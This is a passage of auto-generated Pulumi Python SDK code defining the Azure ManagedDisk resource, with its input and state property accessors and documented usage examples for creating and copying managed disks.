        The maximum number of VMs that can attach to the disk at the same time. A value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        """
        return pulumi.get(self, "max_shares")
    @max_shares.setter
    def max_shares(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_shares", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="networkAccessPolicy")
    def network_access_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        """
        return pulumi.get(self, "network_access_policy")
    @network_access_policy.setter
    def network_access_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "network_access_policy", value)
    @property
    @pulumi.getter(name="onDemandBurstingEnabled")
    def on_demand_bursting_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "on_demand_bursting_enabled")
    @on_demand_bursting_enabled.setter
    def on_demand_bursting_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "on_demand_bursting_enabled", value)
    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> Optional[pulumi.Input[str]]:
        """
        Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        """
        return pulumi.get(self, "os_type")
    @os_type.setter
    def os_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "os_type", value)
    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether it is allowed to access the disk via public network. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")
    @public_network_access_enabled.setter
    def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "public_network_access_enabled", value)
    @property
    @pulumi.getter(name="sourceResourceId")
    def source_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of an existing Managed Disk to copy when `create_option` is `Copy`, or the recovery point to restore when `create_option` is `Restore`.
        """
        return pulumi.get(self, "source_resource_id")
    @source_resource_id.setter
    def source_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_resource_id", value)
    @property
    @pulumi.getter(name="sourceUri")
    def source_uri(self) -> Optional[pulumi.Input[str]]:
        """
        URI to a valid VHD file to be used when `create_option` is `Import`.
        """
        return pulumi.get(self, "source_uri")
    @source_uri.setter
    def source_uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_uri", value)
    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")
    @storage_account_id.setter
    def storage_account_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "storage_account_id", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input[str]]:
        """
        The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        """
        return pulumi.get(self, "tier")
    @tier.setter
    def tier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tier", value)
    @property
    @pulumi.getter(name="trustedLaunchEnabled")
    def trusted_launch_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "trusted_launch_enabled")
    @trusted_launch_enabled.setter
    def trusted_launch_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "trusted_launch_enabled", value)
    # NOTE(review): `zones` is described as a collection but is typed as a single
    # Input[str] — presumably the provider schema flattens it to one zone; confirm
    # against the codegen schema before changing.
    @property
    @pulumi.getter
    def zones(self) -> Optional[pulumi.Input[str]]:
        """
        A collection containing the availability zone to allocate the Managed Disk in.
        """
        return pulumi.get(self, "zones")
    @zones.setter
    def zones(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "zones", value)
@pulumi.input_type
class _ManagedDiskState:
    """
    State (output) properties used for looking up and filtering existing
    ManagedDisk resources. Every field is optional: only the values set by
    the engine/provider are present. Generated by pulumi codegen; each
    property proxies its attribute through pulumi.get/pulumi.set.
    """
    def __init__(__self__, *,
                 create_option: Optional[pulumi.Input[str]] = None,
                 disk_access_id: Optional[pulumi.Input[str]] = None,
                 disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
                 disk_iops_read_only: Optional[pulumi.Input[int]] = None,
                 disk_iops_read_write: Optional[pulumi.Input[int]] = None,
                 disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
                 disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
                 disk_size_gb: Optional[pulumi.Input[int]] = None,
                 encryption_settings: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']] = None,
                 gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
                 hyper_v_generation: Optional[pulumi.Input[str]] = None,
                 image_reference_id: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 logical_sector_size: Optional[pulumi.Input[int]] = None,
                 max_shares: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 network_access_policy: Optional[pulumi.Input[str]] = None,
                 on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
                 os_type: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 source_resource_id: Optional[pulumi.Input[str]] = None,
                 source_uri: Optional[pulumi.Input[str]] = None,
                 storage_account_id: Optional[pulumi.Input[str]] = None,
                 storage_account_type: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tier: Optional[pulumi.Input[str]] = None,
                 trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
                 zones: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ManagedDisk resources.
        :param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
        :param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
        :param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
        :param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        :param pulumi.Input['ManagedDiskEncryptionSettingsArgs'] encryption_settings: An `encryption_settings` block as defined below.
        :param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if `image_reference_id` is specified.
        :param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if `gallery_image_reference_id` is specified.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        :param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. A value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        :param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        :param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        :param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        :param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
        :param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy when `create_option` is `Copy`, or the recovery point to restore when `create_option` is `Restore`.
        :param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
        :param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        :param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        :param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
        """
        # Only set attributes that were actually supplied; unset state fields
        # must stay absent rather than be recorded as explicit Nones.
        if create_option is not None:
            pulumi.set(__self__, "create_option", create_option)
        if disk_access_id is not None:
            pulumi.set(__self__, "disk_access_id", disk_access_id)
        if disk_encryption_set_id is not None:
            pulumi.set(__self__, "disk_encryption_set_id", disk_encryption_set_id)
        if disk_iops_read_only is not None:
            pulumi.set(__self__, "disk_iops_read_only", disk_iops_read_only)
        if disk_iops_read_write is not None:
            pulumi.set(__self__, "disk_iops_read_write", disk_iops_read_write)
        if disk_mbps_read_only is not None:
            pulumi.set(__self__, "disk_mbps_read_only", disk_mbps_read_only)
        if disk_mbps_read_write is not None:
            pulumi.set(__self__, "disk_mbps_read_write", disk_mbps_read_write)
        if disk_size_gb is not None:
            pulumi.set(__self__, "disk_size_gb", disk_size_gb)
        if encryption_settings is not None:
            pulumi.set(__self__, "encryption_settings", encryption_settings)
        if gallery_image_reference_id is not None:
            pulumi.set(__self__, "gallery_image_reference_id", gallery_image_reference_id)
        if hyper_v_generation is not None:
            pulumi.set(__self__, "hyper_v_generation", hyper_v_generation)
        if image_reference_id is not None:
            pulumi.set(__self__, "image_reference_id", image_reference_id)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if logical_sector_size is not None:
            pulumi.set(__self__, "logical_sector_size", logical_sector_size)
        if max_shares is not None:
            pulumi.set(__self__, "max_shares", max_shares)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if network_access_policy is not None:
            pulumi.set(__self__, "network_access_policy", network_access_policy)
        if on_demand_bursting_enabled is not None:
            pulumi.set(__self__, "on_demand_bursting_enabled", on_demand_bursting_enabled)
        if os_type is not None:
            pulumi.set(__self__, "os_type", os_type)
        if public_network_access_enabled is not None:
            pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if source_resource_id is not None:
            pulumi.set(__self__, "source_resource_id", source_resource_id)
        if source_uri is not None:
            pulumi.set(__self__, "source_uri", source_uri)
        if storage_account_id is not None:
            pulumi.set(__self__, "storage_account_id", storage_account_id)
        if storage_account_type is not None:
            pulumi.set(__self__, "storage_account_type", storage_account_type)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tier is not None:
            pulumi.set(__self__, "tier", tier)
        if trusted_launch_enabled is not None:
            pulumi.set(__self__, "trusted_launch_enabled", trusted_launch_enabled)
        if zones is not None:
            pulumi.set(__self__, "zones", zones)
    @property
    @pulumi.getter(name="createOption")
    def create_option(self) -> Optional[pulumi.Input[str]]:
        """
        The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
        """
        return pulumi.get(self, "create_option")
    @create_option.setter
    def create_option(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "create_option", value)
    @property
    @pulumi.getter(name="diskAccessId")
    def disk_access_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the disk access resource for using private endpoints on disks.
        """
        return pulumi.get(self, "disk_access_id")
    @disk_access_id.setter
    def disk_access_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "disk_access_id", value)
    @property
    @pulumi.getter(name="diskEncryptionSetId")
    def disk_encryption_set_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
        """
        return pulumi.get(self, "disk_encryption_set_id")
    @disk_encryption_set_id.setter
    def disk_encryption_set_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "disk_encryption_set_id", value)
    @property
    @pulumi.getter(name="diskIopsReadOnly")
    def disk_iops_read_only(self) -> Optional[pulumi.Input[int]]:
        """
        The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
        """
        return pulumi.get(self, "disk_iops_read_only")
    @disk_iops_read_only.setter
    def disk_iops_read_only(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_iops_read_only", value)
    @property
    @pulumi.getter(name="diskIopsReadWrite")
    def disk_iops_read_write(self) -> Optional[pulumi.Input[int]]:
        """
        The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        """
        return pulumi.get(self, "disk_iops_read_write")
    @disk_iops_read_write.setter
    def disk_iops_read_write(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_iops_read_write", value)
    @property
    @pulumi.getter(name="diskMbpsReadOnly")
    def disk_mbps_read_only(self) -> Optional[pulumi.Input[int]]:
        """
        The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_only")
    @disk_mbps_read_only.setter
    def disk_mbps_read_only(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_mbps_read_only", value)
    @property
    @pulumi.getter(name="diskMbpsReadWrite")
    def disk_mbps_read_write(self) -> Optional[pulumi.Input[int]]:
        """
        The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_write")
    @disk_mbps_read_write.setter
    def disk_mbps_read_write(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_mbps_read_write", value)
    @property
    @pulumi.getter(name="diskSizeGb")
    def disk_size_gb(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        """
        return pulumi.get(self, "disk_size_gb")
    @disk_size_gb.setter
    def disk_size_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_size_gb", value)
    @property
    @pulumi.getter(name="encryptionSettings")
    def encryption_settings(self) -> Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]:
        """
        An `encryption_settings` block as defined below.
        """
        return pulumi.get(self, "encryption_settings")
    @encryption_settings.setter
    def encryption_settings(self, value: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]):
        pulumi.set(self, "encryption_settings", value)
    @property
    @pulumi.getter(name="galleryImageReferenceId")
    def gallery_image_reference_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if `image_reference_id` is specified.
        """
        return pulumi.get(self, "gallery_image_reference_id")
    @gallery_image_reference_id.setter
    def gallery_image_reference_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "gallery_image_reference_id", value)
    @property
    @pulumi.getter(name="hyperVGeneration")
    def hyper_v_generation(self) -> Optional[pulumi.Input[str]]:
        """
        The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "hyper_v_generation")
    @hyper_v_generation.setter
    def hyper_v_generation(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hyper_v_generation", value)
    @property
    @pulumi.getter(name="imageReferenceId")
    def image_reference_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if `gallery_image_reference_id` is specified.
        """
        return pulumi.get(self, "image_reference_id")
    @image_reference_id.setter
    def image_reference_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_reference_id", value)
    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")
    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)
    @property
    @pulumi.getter(name="logicalSectorSize")
    def logical_sector_size(self) -> Optional[pulumi.Input[int]]:
        """
        Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "logical_sector_size")
    @logical_sector_size.setter
    def logical_sector_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "logical_sector_size", value)
    @property
    @pulumi.getter(name="maxShares")
    def max_shares(self) -> Optional[pulumi.Input[int]]:
        """
        The maximum number of VMs that can attach to the disk at the same time. A value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
        """
        return pulumi.get(self, "max_shares")
    @max_shares.setter
    def max_shares(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_shares", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="networkAccessPolicy")
    def network_access_policy(self) -> Optional[pulumi.Input[str]]:
        """
        Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
        """
        return pulumi.get(self, "network_access_policy")
    @network_access_policy.setter
    def network_access_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "network_access_policy", value)
    @property
    @pulumi.getter(name="onDemandBurstingEnabled")
    def on_demand_bursting_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "on_demand_bursting_enabled")
    @on_demand_bursting_enabled.setter
    def on_demand_bursting_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "on_demand_bursting_enabled", value)
    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> Optional[pulumi.Input[str]]:
        """
        Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
        """
        return pulumi.get(self, "os_type")
    @os_type.setter
    def os_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "os_type", value)
    @property
    @pulumi.getter(name="publicNetworkAccessEnabled")
    def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether it is allowed to access the disk via public network. Defaults to `true`.
        """
        return pulumi.get(self, "public_network_access_enabled")
    @public_network_access_enabled.setter
    def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "public_network_access_enabled", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the Managed Disk should exist.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="sourceResourceId")
    def source_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of an existing Managed Disk to copy when `create_option` is `Copy`, or the recovery point to restore when `create_option` is `Restore`.
        """
        return pulumi.get(self, "source_resource_id")
    @source_resource_id.setter
    def source_resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_resource_id", value)
    @property
    @pulumi.getter(name="sourceUri")
    def source_uri(self) -> Optional[pulumi.Input[str]]:
        """
        URI to a valid VHD file to be used when `create_option` is `Import`.
        """
        return pulumi.get(self, "source_uri")
    @source_uri.setter
    def source_uri(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_uri", value)
    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "storage_account_id")
    @storage_account_id.setter
    def storage_account_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "storage_account_id", value)
    @property
    @pulumi.getter(name="storageAccountType")
    def storage_account_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
        """
        return pulumi.get(self, "storage_account_type")
    @storage_account_type.setter
    def storage_account_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "storage_account_type", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
    @property
    @pulumi.getter
    def tier(self) -> Optional[pulumi.Input[str]]:
        """
        The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
        """
        return pulumi.get(self, "tier")
    @tier.setter
    def tier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tier", value)
    @property
    @pulumi.getter(name="trustedLaunchEnabled")
    def trusted_launch_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
        """
        return pulumi.get(self, "trusted_launch_enabled")
    @trusted_launch_enabled.setter
    def trusted_launch_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "trusted_launch_enabled", value)
    # NOTE(review): `zones` is described as a collection but typed as a single
    # Input[str] — presumably the provider schema flattens it to one zone; confirm
    # against the codegen schema before changing.
    @property
    @pulumi.getter
    def zones(self) -> Optional[pulumi.Input[str]]:
        """
        A collection containing the availability zone to allocate the Managed Disk in.
        """
        return pulumi.get(self, "zones")
    @zones.setter
    def zones(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "zones", value)
class ManagedDisk(pulumi.CustomResource):
    # NOTE: auto-generated Pulumi resource class. The two @overload stubs below
    # document the two supported calling conventions (keyword arguments vs. a
    # single ManagedDiskArgs object); the real __init__ dispatches between them
    # and delegates to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 create_option: Optional[pulumi.Input[str]] = None,
                 disk_access_id: Optional[pulumi.Input[str]] = None,
                 disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
                 disk_iops_read_only: Optional[pulumi.Input[int]] = None,
                 disk_iops_read_write: Optional[pulumi.Input[int]] = None,
                 disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
                 disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
                 disk_size_gb: Optional[pulumi.Input[int]] = None,
                 encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
                 gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
                 hyper_v_generation: Optional[pulumi.Input[str]] = None,
                 image_reference_id: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 logical_sector_size: Optional[pulumi.Input[int]] = None,
                 max_shares: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 network_access_policy: Optional[pulumi.Input[str]] = None,
                 on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
                 os_type: Optional[pulumi.Input[str]] = None,
                 public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 source_resource_id: Optional[pulumi.Input[str]] = None,
                 source_uri: Optional[pulumi.Input[str]] = None,
                 storage_account_id: Optional[pulumi.Input[str]] = None,
                 storage_account_type: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tier: Optional[pulumi.Input[str]] = None,
                 trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
                 zones: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a managed disk.

        ## Example Usage
        ### With Create Empty

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_managed_disk = azure.compute.ManagedDisk("exampleManagedDisk",
            location="West US 2",
            resource_group_name=example_resource_group.name,
            storage_account_type="Standard_LRS",
            create_option="Empty",
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        ```
        ### With Create Copy

        ```python
        import pulumi
        import pulumi_azure as azure

        example = azure.core.ResourceGroup("example", location="West Europe")
        source = azure.compute.ManagedDisk("source",
            location="West US 2",
            resource_group_name=example.name,
            storage_account_type="Standard_LRS",
            create_option="Empty",
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        copy = azure.compute.ManagedDisk("copy",
            location="West US 2",
            resource_group_name=example.name,
            storage_account_type="Standard_LRS",
            create_option="Copy",
            source_resource_id=source.id,
            disk_size_gb=1,
            tags={
                "environment": "staging",
            })
        ```

        ## Import

        Managed Disks can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:compute/managedDisk:ManagedDisk example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/microsoft.compute/disks/manageddisk1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
        :param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
        :param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
        :param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        :param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        :param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        :param pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']] encryption_settings: A `encryption_settings` block as defined below.
